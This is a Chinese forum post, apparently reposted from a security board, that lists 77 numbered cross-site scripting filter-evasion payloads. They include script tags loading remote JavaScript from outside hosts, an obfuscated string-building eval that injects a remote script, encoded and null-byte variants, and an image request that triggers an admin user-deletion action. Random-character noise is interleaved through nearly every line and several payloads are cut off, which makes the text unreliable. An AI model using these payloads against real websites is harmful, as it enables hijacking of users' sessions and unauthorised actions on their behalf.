貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。( V! y) X- v$ c: Z
$ w* A+ z* X+ G D2 {: i: x
(1)普通的XSS JavaScript注入6 F0 @1 O1 `' ^. H# }0 Q2 ~5 U
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
# b4 c3 \2 a' l& \7 j( I2 D0 b5 E+ s$ ~; ^* J! E+ z
(2)IMG标签XSS使用JavaScript命令
! n- r# O$ U2 {& }% Z3 M7 `. z( ? <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
% z6 w3 _5 U' g; T7 |! E. ~# I$ P
(3)IMG标签无分号无引号
" K, B# S- \7 C* L <IMG SRC=javascript:alert(‘XSS’)>2 }& G4 d, f7 d) ^
* k; Z' c* k' t# P, Z {
(4)IMG标签大小写不敏感/ [8 X* B9 a1 h: b6 r" Z
<IMG SRC=JaVaScRiPt:alert(‘XSS’)># b, S, `/ k/ o8 F: @
! [, n3 z1 ^! L% _. s, T6 ?- J
(5)HTML编码(必须有分号) R' e, f$ g# w- Q
<IMG SRC=javascript:alert(“XSS”)>8 r |" i2 q, `/ g- E' E
8 W, P! Z7 _4 f' t B6 Z
(6)修正缺陷IMG标签
g, {) s" k7 x- q5 w <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>3 T. r' m- C) d4 g$ [$ n, Q3 U9 B
2 F% S6 E3 h0 b1 I
(7)formCharCode标签(计算器)
9 h/ s( ^" n! e5 z <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>/ g1 }' H9 n" h# j9 E; D R& h, Z
, S+ H/ K( [- v$ {8 { (8)UTF-8的Unicode编码(计算器)) i. h' n" o2 _0 y" e2 M: @6 ^0 u
<IMG SRC=jav..省略..S')>
; ~% w2 i) c" w* t5 A9 L n
. {# [& I: f* s6 M5 d. J; n (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
% U( D3 V5 N" `# P <IMG SRC=jav..省略..S')>5 q! x' ]/ F S3 x4 @1 l
& r0 A! X9 i5 ` (10)十六进制编码也是没有分号(计算器)& t$ n) O, Z) }1 A/ o, M
<IMG SRC=java..省略..XSS')>4 a% A1 D0 [& ^3 w/ A
: c4 T! N6 h$ Q8 a
(11)嵌入式标签,将Javascript分开. F0 x E2 q9 k$ ?/ A9 p
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 p6 B4 D- O+ j) x
- g. [( a2 n* ^3 O. Q3 ` (12)嵌入式编码标签,将Javascript分开
, U, R; r i/ o! L' I <IMG SRC=”jav ascript:alert(‘XSS’);”>
9 A& P4 J/ I3 e: p% J
! `- Y) U1 L+ a6 p8 [ (13)嵌入式换行符1 X& [0 u. \3 k8 b
<IMG SRC=”jav ascript:alert(‘XSS’);”># I+ k# P9 j, k; K! V( x# m
' R% Z+ k5 k+ {8 [& K# M2 H9 S! X (14)嵌入式回车. Q& r4 v7 y3 D4 C7 s' P! ^
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 f6 @3 @, r: y' Q" l; }: o
, x6 u- q4 \. v& N1 p1 E+ y" C* c
(15)嵌入式多行注入JavaScript,这是XSS极端的例子: }( k2 L* b8 Z! m4 @8 u
<IMG SRC=”javascript:alert(‘XSS‘)”>
: W9 z& F# E% K" E& s7 R+ U L
2 T' T) y9 J, e+ O, }" } (16)解决限制字符(要求同页面)
+ e; r- `. g* |3 w9 F <script>z=’document.’</script>
- }" q+ P: a! X H$ g0 ]8 C <script>z=z+’write(“‘</script>
. L0 B: m% c2 ^ <script>z=z+’<script’</script>3 i: a: X1 Q! @8 p
<script>z=z+’ src=ht’</script>* k6 {7 f9 R" n$ d. e8 p
<script>z=z+’tp://ww’</script>
I; }9 m$ l9 c6 o# C% O" _ <script>z=z+’w.shell’</script>
6 U3 M) f. ^8 `/ N0 c <script>z=z+’.net/1.’</script>7 ^4 ~$ X8 i% x5 n4 G+ o
<script>z=z+’js></sc’</script>+ P/ M; V! n# t$ x5 p! m7 @
<script>z=z+’ript>”)’</script>
6 d& ^ k5 x" W$ t n* ^0 r1 K <script>eval_r(z)</script>
! V c! L8 y4 ^9 Z( U# J7 }: u
; V- i4 R Y% J) X (17)空字符
4 u0 x" O; J( G3 A perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out1 a" f! I& Q6 p" y0 x+ |
" W/ J4 x/ s: B# H; d8 R5 m (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
+ C. [2 T6 ^2 c7 s1 w) l! S perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
u/ Z7 v% K3 W5 ~! E5 ^+ k6 h7 Q ]+ y2 g: \- R' h
(19)Spaces和meta前的IMG标签
/ J o, Q2 j+ ^" Q8 ~7 c/ j( q8 _, b' u <IMG SRC=” javascript:alert(‘XSS’);”>1 L3 ]0 `/ `+ c6 N. r7 m
. a8 ~5 ]! n6 w0 n9 \! t
(20)Non-alpha-non-digit XSS
2 Z) S2 |: v6 i* ~0 ~7 L <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) P5 Q0 a' F, x, b( H
) T" q/ Z) R! I( M+ u: _$ K8 B
(21)Non-alpha-non-digit XSS to 2
6 ~0 o! \$ o! P <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
/ m' M& J. R' M! c a, I) K3 M7 B/ Z. A' T" N* ^, ~4 N0 k
(22)Non-alpha-non-digit XSS to 3
) ]$ s. j) J+ a7 }: }9 ~ <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>) F+ U+ V: X$ J: @6 }+ E# H6 U6 g2 O. C
$ N4 p3 A2 L: X( C (23)双开括号
1 H# Y" f3 R! ~# g8 _! a# o, Z <<SCRIPT>alert(“XSS”);//<</SCRIPT>
1 {* F; D5 h- @; E" b( m5 `/ y, W7 L( [/ a" W0 \1 r# G( v, n0 A- f
(24)无结束脚本标记(仅火狐等浏览器)
& d& f& j; _ _# ^2 g/ U6 G <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
O3 k! }6 `9 i c9 z. r" w
2 O: P9 r; e7 h' W- I& C (25)无结束脚本标记2/ o* a" J- z. h( Z7 Q8 X; P0 I" p
<SCRIPT SRC=//3w.org/XSS/xss.js>
% f! o2 C% O2 r
+ V4 E$ V$ b; N! `1 R (26)半开的HTML/JavaScript XSS5 w$ O w5 J' S0 H: \
<IMG SRC=”javascript:alert(‘XSS’)”$ w; Z6 q) G: q
) }* r- x3 I1 j$ Z: q% S1 I
(27)双开角括号
7 u" ~* i w- O: _' ^3 C p9 o" Z <iframe src=http://3w.org/XSS.html <
+ g* `2 K, W4 M5 d" r7 Q: `
! x9 I3 B0 y( j0 I2 K* n (28)无单引号 双引号 分号
6 Q0 N) k: X/ d; ]* {/ l9 P6 o6 t7 E8 Z <SCRIPT>a=/XSS/
( |/ x$ i( H" ~4 K' j; p+ ~/ p: r4 ~ alert(a.source)</SCRIPT>& [; F! [' k3 S' h' i, L" W$ s
- x" p$ W C: g) ?, v1 T
(29)换码过滤的JavaScript/ K# L' B" _. S3 T& w3 d9 }
\”;alert(‘XSS’);// X; \+ {' |* p$ M3 i6 j
9 R" Y5 o7 x; ? D+ L4 u (30)结束Title标签, q4 o! V7 w8 R1 Y, R2 ?+ g3 z% C& U; n' o
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
2 g) R# z6 H* R. \& \2 p
3 }' i9 a0 q' j4 X" G (31)Input Image% e. p/ h$ m! Y
<INPUT SRC=”javascript:alert(‘XSS’);”>/ @8 D* q F3 w* w: n; b" Q
4 O6 H1 b Q9 ?5 G (32)BODY Image5 @+ o# y* B! @2 R
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>) N" }* n& i3 {4 t, q+ _
! ]" S' _/ V3 X" I0 c1 v/ ]
(33)BODY标签* i- J0 ^% Q o; j( U1 W
<BODY(‘XSS’)>& E; p7 e4 P8 D: N R. @4 r! q
3 J% I4 w5 [8 ] T& l0 l4 r' } (34)IMG Dynsrc# u* G3 M+ V1 U. A' n& D X$ y$ x
<IMG DYNSRC=”javascript:alert(‘XSS’)”>! A2 d2 `/ P, b4 e% ^' K
: I. z# P0 W, e
(35)IMG Lowsrc
& A+ E/ B! `2 @2 E# i <IMG LOWSRC=”javascript:alert(‘XSS’)”>! `9 ~" O% e7 z- P; d: | x
. \0 E. b5 U+ C (36)BGSOUND* v5 S3 S1 M. R* Y
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
7 @; z! K' g- n/ ~+ O0 a- K" o7 ?1 I4 Y& S; U; `/ P5 O
(37)STYLE sheet
1 }* g4 c8 A9 D: N <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
# u% ?/ Q) _! Z" D# a$ H) v) ?7 b
(38)远程样式表
3 \' T' O# g. Q* a4 H <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>' T4 @. _3 X+ M3 M) ]1 q2 D
" ]% }0 Z K2 a* A- Q6 W; e2 ]! H: u (39)List-style-image(列表式)
% F; H0 \( ?. g+ t <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
* Q5 d, H- h5 G e6 a$ j0 \. E8 g
(40)IMG VBscript
& {7 |5 A: R1 h% I3 F <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 `& @) C9 x/ O* r" S1 e# Z+ b4 O3 ?- ~" B y" ~/ |; |- R
(41)META链接url
# G9 y4 E5 D4 ]8 B- W4 p3 X: x <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
6 u9 _; Q9 }% h4 |6 O) F1 y4 Q# m* v' K% I( K
(42)Iframe& J% n0 X. K5 q2 D
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
& K& s6 Z6 w0 G. u2 A, ]* a4 A1 D: \" ^! h- A" Z
(43)Frame2 k1 Z) E6 D- H
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
O0 `' C# K; }; T3 \* c. r" b- H J2 Z1 o
(44)Table
5 q9 s1 N* r5 B p, T/ c <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
$ s) q; x! e q. \( D9 P! R* c* T [8 p3 ^9 M ^/ g" J3 o$ E: ~
(45)TD
2 T8 o- Y9 E' P3 u* w <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>8 Z* K( j5 [) y" e5 |
4 [# g0 L0 |; N7 R0 M$ b
(46)DIV background-image, }3 j# F/ W4 B
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>2 g6 @, D; ^ B6 D% {# |
+ [+ w& U0 _( q
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)# r1 \8 n3 ^0 ]5 Q9 D
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>0 R) B/ n4 j+ T* n
" C0 M2 u5 R$ [+ M; v0 w (48)DIV expression' D O5 Y* l+ H) N* N
<DIV STYLE=”width: expression_r(alert(‘XSS’));”> m/ s1 u$ c+ c, `: f. Q5 t
8 a8 C3 r+ a b$ \: Q3 ^
(49)STYLE属性分拆表达" l6 i' [; N; }$ s- D
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>9 q0 q, x. o6 V% p
4 Q7 H+ ~, T9 f* Q8 W! E# k
(50)匿名STYLE(组成:开角号和一个字母开头)+ y! l4 O& ^8 e1 n7 G
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>9 h! y A0 s# X9 Z8 ~# m9 Y
9 y8 d( ?* [& m' u
(51)STYLE background-image
% Y' |& \; N7 ], [2 Z0 D8 X6 T0 | <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>! H8 z9 d# u7 |" ^6 l# m4 [ K# T
3 `5 `7 e9 B2 }0 ~1 r (52)IMG STYLE方式$ A6 u0 `+ L* T& k! s/ [
exppression(alert(“XSS”))’>
) E/ K7 B' i1 D+ V1 @0 k+ r) {( H; J" ~7 Y7 r
(53)STYLE background8 ^. N7 ~9 E) w- d. W
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE># ?! C, y& [0 s" z+ _
# D I# {5 I+ T k- @$ d
(54)BASE
/ f V# q- s. K7 a- p4 F <BASE HREF=”javascript:alert(‘XSS’);//”>
( Z# T/ j7 T$ i& g( ]4 k) d+ E/ q
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! K* C0 I+ N% I2 Q <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>" d* k8 P5 [/ W2 t% J
4 N% o0 ?1 T' n+ n) ^. p- { (56)在flash中使用ActionScrpt可以混进你XSS的代码
, ^! v6 V9 I9 L' ~) ]/ L& q a=”get”;2 u# ]% o: o; e. ~- u* Q9 `1 V
b=”URL(\”";* y& A9 E: K% {" n. L( a4 t& B+ ~
c=”javascript:”;
3 H- I# J: Q- F: `: [# O' n: u2 C1 D d=”alert(‘XSS’);\”)”;
: E! ]- Y* m, g) v eval_r(a+b+c+d);
# @5 c1 Z x: Z: \& q+ K0 d, c5 [
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
9 V% v; M% [ S4 h <HTML xmlns:xss>
# C* S! ^1 }& {( g4 K/ x: n4 V& Q9 j. T <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>% H) V; s/ `) D0 ]' V7 T" |7 V1 x4 z
<xss:xss>XSS</xss:xss>
* |2 {! g; N. N: g/ V9 h% y </HTML>5 f, T/ O$ \, Y
# `" @, I) c2 B" g
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
9 U' s+ x! c$ X4 i <SCRIPT SRC=””></SCRIPT>8 s/ t4 a# n( z9 M, T- ?
8 e% w/ g$ i# T2 b1 }3 v
(59)IMG嵌入式命令,可执行任意命令6 H d; S4 w9 K. `
<IMG SRC=”http://www.XXX.com/a.php?a=b”>" A/ R. c3 Y$ j8 u
8 K1 u+ \) Y G( t) ~
(60)IMG嵌入式命令(a.jpg在同服务器)! P; ]2 w4 F# v9 ~$ e& O* F
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
; E7 O4 M0 K2 D- X3 c! s% Q
6 ^" c' [/ @. \' A% G# z( a (61)绕符号过滤
* e9 ?; c& ] T <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>' e4 g* A6 U. C3 I( }! F f
) d. C; z7 W! u2 ^" R1 y
(62)
( j! r& o0 M/ A7 R, n5 @) i/ c <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>+ P1 d) `! l$ F% X5 z
& R* V; i" h. w! j1 B0 s" Y- ]
(63)
* P. z, J4 }; W: f <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
& u& x0 R/ E3 U7 \, r# a* A5 W" q! K0 k( M: |+ W
(64)7 r; p }8 [0 q7 B' w& ]6 v) \
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
9 {- C1 { \7 p2 f' B+ G* t& }( G7 r
(65)
5 k, [' x- d. b6 Y# ~6 a <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
. D6 y) N9 C4 \1 w. E+ K4 J6 b* F) w3 J- e6 ^5 h- U% Q
(66)
0 F6 t' h% H) S <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
# m5 S* e( Y' O% ~1 I
) B1 @ F2 d! Q (67)
. L+ e' S+ D6 V <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>" Q W" N3 \$ Q* g
* ~9 k9 V1 Q. H- @4 X
(68)URL绕行
* E& z1 P7 Q2 W) x: s/ w <A HREF=”http://127.0.0.1/”>XSS</A># ?0 |: O. H" v" G' U
- ?6 r6 N* W; e4 D j
(69)URL编码
: w- Q9 k' J4 l2 P( o <A HREF=”http://3w.org”>XSS</A>
% Z: _ @, n2 X9 w1 F4 O8 F: |% ~ p. u" o/ G, G' L
(70)IP十进制
9 [ I+ f- X" h# o$ D( `# @ <A HREF=”http://3232235521″>XSS</A>& ~; J5 N$ {4 ?
( G, I0 U0 c7 I5 b% l! n
(71)IP十六进制
- ~3 b4 R6 Y5 t9 R <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>6 R* j: _4 e- T& C6 _. l
p- x! @2 y. k% k3 Y (72)IP八进制$ ?2 L0 X' x/ I5 J; F- p- d+ X1 R
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
# n& I9 G |. @( I3 I
' M' @# Z8 K; L) ]4 }7 _ (73)混合编码3 v# j9 Q9 \& U, `$ K& t3 ?, o
<A HREF=”h
' i4 G) z- _0 s G. }: u+ a- f tt p://6 6.000146.0×7.147/”">XSS</A>, l, J1 U2 L8 U. x
2 | O% B' C& Q) j# U+ G2 Q- q+ x (74)节省[http:]/ h# c! |- F S
<A HREF=”//www.google.com/”>XSS</A>
' {0 }, a# l! J7 ?5 A. y$ X
: ^( p7 S5 e1 A4 C" X (75)节省[www]+ a- t9 H4 i5 H0 m) _ z/ U! n
<A HREF=”http://google.com/”>XSS</A>2 ?9 j2 c0 J+ d2 o9 W
5 E9 q+ s- d: P" t& ^9 l (76)绝对点绝对DNS( u2 g N% g9 O% V8 c
<A HREF=”http://www.google.com./”>XSS</A>! P* {* b( [5 ]
' N) V7 b6 a$ ?( B; y; p8 h/ w (77)javascript链接
3 X) T( L0 l' ? <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |